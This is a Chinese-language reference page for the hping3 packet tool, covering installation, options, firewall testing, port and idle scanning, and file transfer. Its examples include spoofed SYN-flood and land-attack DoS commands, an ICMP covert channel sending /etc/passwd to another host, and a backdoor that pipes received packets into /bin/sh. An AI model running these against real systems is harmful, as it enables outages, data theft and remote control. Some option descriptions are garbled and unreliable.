(hping3) - 测试网络及主机的安全

hping3

测试网络及主机的安全

补充说明

hping 是用于生成和解析TCPIP协议数据包的开源工具。创作者是Salvatore Sanfilippo。目前最新版是hping3,支持使用tcl脚本自动化地调用其API。hping是安全审计、防火墙测试等工作的标配工具。hping优势在于能够定制数据包的各个部分,因此用户可以灵活对目标机进行细致地探测。

安装

yum install libpcap-devel tc-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install

选项

-H --help 显示帮助。
-v -VERSION 版本信息。
-c --count count 发送数据包的次数 关于countreached_timeout 可以在hping2.h里编辑。
-i --interval 包发送间隔时间(单位是毫秒)缺省时间是1秒,此功能在增加传输率上很重要,在idle/spoofing扫描时此功能也会被用到,你可以参考hping-howto获得更多信息-fast 每秒发10个数据包。
-n -nmeric 数字输出,象征性输出主机地址。
-q -quiet 退出。
-I --interface interface name 无非就是eth0之类的参数。
-v --verbose 显示很多信息,TCP回应一般如:len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D --debug 进入debug模式当你遇到麻烦时,比如用HPING遇到一些不合你习惯的时候,你可以用此模式修改HPING,(INTERFACE DETECTION,DATA LINK LAYER ACCESS,INTERFACE SETTINGS,.......)
-z --bind 快捷键的使用。
-Z --unbind 消除快捷键。
-O --rawip RAWIP模式,在此模式下HPING会发送带数据的IP头。
-1 --icmp ICMP模式,此模式下HPING会发送IGMP应答报,你可以用--ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文。
-2 --udp UDP 模式,缺省下,HPING会发送UDP报文到主机的0端口,你可以用--baseport --destport --keep选项指定其模式。
-9 --listen signatuer hping的listen模式,用此模式,HPING会接收指定的数据。
-a --spoof hostname 伪造IP攻击,防火墙就不会记录你的真实IP了,当然回应的包你也接收不到了。
-t --ttl time to live 可以指定发出包的TTL值。
-H --ipproto 在RAW IP模式里选择IP协议。
-w --WINID UNIX ,WINDIWS的id回应不同的,这选项可以让你的ID回应和WINDOWS一样。
-r --rel 更改ID的,可以让ID曾递减输出,详见HPING-HOWTO。
-F --FRAG 更改包的FRAG,这可以测试对方对于包碎片的处理能力,缺省的“virtual mtu”是16字节。
-x --morefrag 此功能可以发送碎片使主机忙于恢复碎片而造成主机的拒绝服务。
-y -dontfrag 发送不可恢复的IP碎片,这可以让你了解更多的MTU PATH DISCOVERY。
-G --fragoff fragment offset value set the fragment offset
-m --mtu mtu value 用此项后ID数值变得很大,50000没指定此项时3000-20000左右。
-G --rroute 记录路由,可以看到详悉的数据等等,最多可以经过9个路由,即使主机屏蔽了ICMP报文。
-C --ICMPTYPE type 指定ICMP类型,缺省是ICMP echo REQUEST。
-K --ICMPCODE CODE 指定ICMP代号,缺省0。
--icmp-ipver 把IP版本也插入IP头。
--icmp-iphlen 设置IP头的长度,缺省为5(32字节)。
--icmp-iplen 设置IP包长度。
--icmp-ipid 设置ICMP报文IP头的ID,缺省是RANDOM。
--icmp-ipproto 设置协议的,缺省是TCP。
-icmp-cksum 设置校验和。
-icmp-ts alias for --icmptype 13 (to send ICMP timestamp requests)
--icmp-addr Alias for --icmptype 17 (to send ICMP address mask requests)
-s --baseport source port hping 用源端口猜测回应的包,它从一个基本端口计数,每收一个包,端口也加1,这规则你可以自己定义。
-p --deskport [+][+]desk port 设置目标端口,缺省为0,一个加号设置为:每发送一个请求包到达后,端口加1,两个加号为:每发一个包,端口数加1。
--keep 上面说过了。
-w --win 发的大小和windows一样大,64BYTE。
-O --tcpoff Set fake tcp data offset. Normal data offset is tcphdrlen / 4.
-m --tcpseq 设置TCP序列数。
-l --tcpck 设置TCP ack。
-Q --seqnum 搜集序列号的,这对于你分析TCP序列号有很大作用。

Hping3功能

Hping3主要有以下典型功能应用:

防火墙测试

使用Hping3指定各种数据包字段,依次对防火墙进行详细测试。请参考:http://0daysecurity.com/articles/hping3_examples.html

测试防火墙对ICMP包的反应、是否支持traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击(DoS attack)。例如,以LandAttack方式测试目标防火墙(Land Attack是将发送源地址设置为与目标地址相同,诱使目标机与自己不停地建立连接)。

hping3 -S  -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

端口扫描

Hping3也可以对目标端口进行扫描。Hping3支持指定TCP各个标志位、长度等信息。以下示例可用于探测目标机的80端口是否开放:

hping3 -I eth0  -S 192.168.10.1 -p 80

其中-I eth0指定使用eth0端口,-S指定TCP包的标志位SYN,-p 80指定探测的目的端口。

hping3支持非常丰富的端口探测方式,nmap拥有的扫描方式hping3几乎都支持(除开connect方式,因为Hping3仅发送与接收包,不会维护连接,所以不支持connect方式探测)。而且Hping3能够对发送的探测进行更加精细的控制,方便用户微调探测结果。当然,Hping3的端口扫描性能及综合处理能力,无法与Nmap相比。一般使用它仅对少量主机的少量端口进行扫描。

Idle扫描

Idle扫描(Idle Scanning)是一种匿名扫描远程主机的方式,该方式也是有Hping3的作者Salvatore Sanfilippo发明的,目前Idle扫描在Nmap中也有实现。

该扫描原理是:寻找一台idle主机(该主机没有任何的网络流量,并且IPID是逐个增长的),攻击端主机先向idle主机发送探测包,从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包(此处假设为SYN包),此时如果远程主机的目的端口开放,那么会回复SYN/ACK,此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包,获取其IPID。那么对比两次的IPID值,我们就可以判断远程主机是否回复了数据包,从而间接地推测其端口状态。

拒绝服务攻击

使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接,伪造源地址为192.168.10.99,并使用1000微秒的间隔发送各个SYN包。

hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

其他攻击如smurf、teardrop、land attack等也很容易构建出来。

文件传输

Hping3支持通过TCP/UDP/ICMP等包来进行文件传输。相当于借助TCP/UDP/ICMP包建立隐秘隧道通讯。实现方式是开启监听端口,对检测到的签名(签名为用户指定的字符串)的内容进行相应的解析。在接收端开启服务:

hping3 192.168.1.159--listen signature --safe  --icmp

监听ICMP包中的签名,根据签名解析出文件内容。

在发送端使用签名打包的ICMP包发送文件:

hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd

/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节(-d 100),发送签名为signature(-sign signature)。

木马功能

如果Hping3能够在远程主机上启动,那么可以作为木马程序启动监听端口,并在建立连接后打开shell通信。与netcat的后门功能类似。

示例:本地打开53号UDP端口(DNS解析服务)监听来自192.168.10.66主机的包含签名为signature的数据包,并将收到的数据调用/bin/sh执行。

在木马启动端:

hping3 192.168.10.66--listen signature --safe --udp -p 53 | /bin/sh

在远程控制端:

echo ls >test.cmd
hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd

将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口,包数据长度为100字节。

当然这里只是简单的演示程序,真实的场景,控制端可以利益shell执行很多的高级复杂的操作。

热点新闻

美国企业暂停政治捐款:实质影响有限 更具有象征意义

更多大公司在采取行动,纷纷与美国总统特朗普及其共和党盟友划清界限。1月6日,特朗普的支持者暴力冲击美国国会大厦之后,美国科技业、银行业、制造业等各大公司纷纷宣布,暂停对投票反对认证总统选举结果的共和党人的政治捐款。 阅读全文

发布于:2021-01-15T15:44:44Z  |  142次阅读  |  详细内容 »

比亚迪王传福:电动车全面替代燃油车的时机已成熟

1月16日,比亚迪股份有限公司董事长王传福在第七届中国电动汽车百人会线上论坛上发表演讲时表示,随着近年来电动车的电池、电机、电控等技术越来越成熟,在加速、噪音、能耗、维修便利性、智能化和全生命周期成本等方面已全面超越了燃油车,电动车全面替代燃油车的时机已成熟。 阅读全文

发布于:2021-01-16T23:44:32Z  |  96次阅读  |  详细内容 »

全国小学生喜提最长寒假 低价试听网课用户暴增300%

对于全国的小学生来说,今年的寒假来得更早,而针对中小学生的网课又开始大量上线。记者在采访中了解到,很多家长在寒假前就为孩子提前规划,把网课加入到必买清单中。线上教育业内人士告诉记者,寒假一直以来就是传统的网课报名高峰。 阅读全文

发布于:2021-01-17T16:44:37Z  |  75次阅读  |  详细内容 »

BestLife新榜单评选出美国民众最讨厌的10家连锁餐厅

据外媒BGR报道,虽然在过去的几个月里,新冠大流行几乎影响了所有类型的企业,但没有哪个行业比餐饮业受到的冲击更大。根据NRA的一项估计,2020年美国有高达17%以上的餐厅会因为COVID-19疫情而关闭。仅从2月到9月,估计就有10万家餐厅永久或永远关闭。即使餐厅能够继续营业,餐厅老板的收入损失也是巨大的。 阅读全文

发布于:2021-01-13T13:18:34Z  |  70次阅读  |  详细内容 »

TCL 20系列亮相 承诺带来更实惠的5G机型

TCL透露了一个全新的、更实惠的5G智能手机系列,美国定价预计将落在300美元以下。20系列是继CES 2020发布的10系列之后,标志着TCL首次在智能手机设备上打上自己的品牌。去年我们已经看到10系列的机型带来的价格杀伤力,Verizon提供的TCL 10 5G UW价格不到400美元,使其成为最实惠的5G mmWave兼容智能手机之一。 阅读全文

发布于:2021-01-12T01:14:52Z  |  64次阅读  |  详细内容 »

CES 2021:Razer展示Project Hazel智能概念口罩

在 COVID-19 大流行的背景下,知名电竞外设制造商雷蛇(Razer)不仅将部分工厂产能调整用于生产和捐赠百万级的医用外科口罩,还顺势在 CES 2021 期间展示了一款名叫 Project Hazel 的智能概念口罩。虽然 Project Hazel 不大可能成为一款会批量生产并上市的零售产品,但内置可充电电池、能够为两侧空气过滤系统提供能源的设计,还是让我们眼前一亮。 阅读全文

发布于:2021-01-13T13:16:01Z  |  62次阅读  |  详细内容 »

TP-Link 发布新款 6GHz Wi-Fi路由器和 Mesh 系统

TP-Link 今天发布了两款全新 mesh WiFi 6E 系统,两款全新三频 WiFi 6E 路由器。WiFi 6E 是 WiFi 6 的增强版,支持 6GHz 频段。TP-Link 全新 Deco X96 mesh WiFi 系统支持 6GHz、5GHz 和 2.4GHz 三频 WiFi,三频最高速度 6600 Mbps。 阅读全文

发布于:2021-01-12T02:46:34Z  |  57次阅读  |  详细内容 »

LG2021年电视阵容中部分产品采用了史上最亮的OLED面板

根据LG的说法,2021年代表着其OLED电视的重大飞跃,这要归功于全新的 "OLED Evo "面板,它能输出更明亮的画面。多年来,亮度一直是液晶电视的制胜因素,尽管有完美的黑色和惊人的可视角度,但有时如果你把它放在一个超亮的房间里,OLED设备就无法完成工作。但LG表示,在其新的G1系列中采用的Evo面板,亮度和HDR改进高于之前任何一款OLED电视。 阅读全文

发布于:2021-01-12T02:46:44Z  |  56次阅读  |  详细内容 »

TCL可穿戴式显示器将1080p OLED显示屏装进太阳镜里

TCL计划在今年推出TCL可穿戴显示器,这是一副高科技的太阳镜,也可以作为私人观看的虚拟电视。这家公司以其全尺寸电视和一系列智能手机而闻名。在去年的CES上,TCL以Project Archery为代号预览了这一想法,不过现在这一概念正逐渐发展成一个完整的商业产品。 阅读全文

发布于:2021-01-12T01:14:49Z  |  56次阅读  |  详细内容 »

蔚来ET7取消交流充电口 李斌:省钱,也在研发直流口随车充

蔚来首款电动轿车ET7发布仅一天,其充电方式便引发网友吐槽。有网友质疑,ET7取消了“交流慢充充电口”将无法满足多数场景需求,“电动爹成了高贵的’爹中爹‘”。而蔚来董事长、创始人兼首席执行官李斌也在采访环节谈到了这一问题。 阅读全文

发布于:2021-01-11T01:14:38Z  |  55次阅读  |  详细内容 »

漫步者在CES 2021上推出了两款无线耳塞以及D12蓝牙音箱

音频设备生产商Edifier(漫步者)在CES 2021上推出了两款无线耳塞,分别是TWS NB2 Pro和GM5,以及采用经典木纹处理的D12蓝牙音箱。继TWS NB之后,TWS NB2 Pro是一款采用降噪技术的无线耳塞。经过测试和认证,这款耳机可以阻挡中频和低频的环境声音,据称可以在提供均衡声音的同时,保护用户免受外界干扰。 阅读全文

发布于:2021-01-12T02:46:43Z  |  53次阅读  |  详细内容 »

Ubtech公司在CES 2021上推出Adibot巨型紫外线消毒机器人

Ubtech公司推出Adibot巨型紫外线消毒机器人。它是一个巨大的圆柱形怪兽,唯一的目的是用紫外线给房间消毒。Adibot主要针对小型企业和学校。Ubtech今年推出两款机型。Adibot-S是固定式型号,设计成可以手动从一个房间推到另一个房间,它将在1月份上市,价格将高达2万美元。升级后的Adibot-A可以使用激光雷达传感器进行自动行驶。它的零售价将是4万美元,并在5月推出。 阅读全文

发布于:2021-01-12T02:46:39Z  |  51次阅读  |  详细内容 »

TCL在CES 2021上展示滚屏OLED手机和平板电脑

TCL不仅仅是将其平价的20系列Android智能手机带到了CES 2021上,它还向公众展示了两款新的可滚动OLED面板,这两款面板有望带来更有趣的产品。TCL表示,一款6.7英寸AMOLED可滚动显示屏和一款17英寸印刷OLED滚动显示屏可以让一款小型智能手机打开成为Phablet,甚至是一款巨大的平板电脑,从一个更小的卷轴中滚出来。 阅读全文

发布于:2021-01-12T01:14:48Z  |  51次阅读  |  详细内容 »

苹果分享新广告 宣传隐私和环保

苹果通常会在每年的 CES 展会上宣传公司致力于保护用户隐私,今年也不例外。苹果分享了两段隐私相关的广告,介绍了面容 ID 以及 Apple Pay。在广告中苹果提到,面容 ID 数据以及 Apple Pay 购物历史不会被分享,苹果自己也不例外。 阅读全文

发布于:2021-01-12T02:46:45Z  |  50次阅读  |  详细内容 »

LG再次预告其屏幕可滚动的智能手机

LG再次预告其屏幕可滚动的智能手机。在今天CES 2021上,LG提供了一段视频,展示了迄今为止该设备最佳外观,这款产品命名为LG Rollable, 该设备具有该公司所谓的 "独特的可调整大小的屏幕",从手机转变为小型平板电脑. 该屏幕可以滑动到位,扩大其屏幕面积。 阅读全文

发布于:2021-01-12T02:46:41Z  |  50次阅读  |  详细内容 »

TCL宣布推出新的阿尔卡特智能手机和一款新的平板电脑

在今年的CES上,TCL将刷新阿尔卡特的产品阵容。新的产品线主要针对低端市场,包含三款新的智能手机和一款新的平板电脑。首先是阿尔卡特3L,采用6.54英寸HD+ 20:9显示屏。内置八核联发科MTK6762D芯片组,4GB内存,64GB内部存储。它的背面有4800万像素的主摄像头,以及200万像素深度传感器和200万像素微距摄像头。前置摄像头为800万像素。 阅读全文

发布于:2021-01-12T01:14:51Z  |  49次阅读  |  详细内容 »

被指控在“国会骚乱”期间助长暴力 Twitter和FB股价双双下跌

据报道,由于被指控在“国会骚乱”期间助长暴力,Twitter和Facebook两大社交平台的股价在周一盘前交易中均大幅下滑。今日盘前交易中,Twitter股价下跌了6.9%,Facebook股价也下跌1.7%。今日早些时候,特朗普支持者使用的社交平台Parler也被迫下线,原因是亚马逊不再为其提供托管服务。在此之前,谷歌和苹果已将Parler赶出其应用商店。 阅读全文

发布于:2021-01-12T01:14:45Z  |  49次阅读  |  详细内容 »

热门Linux命令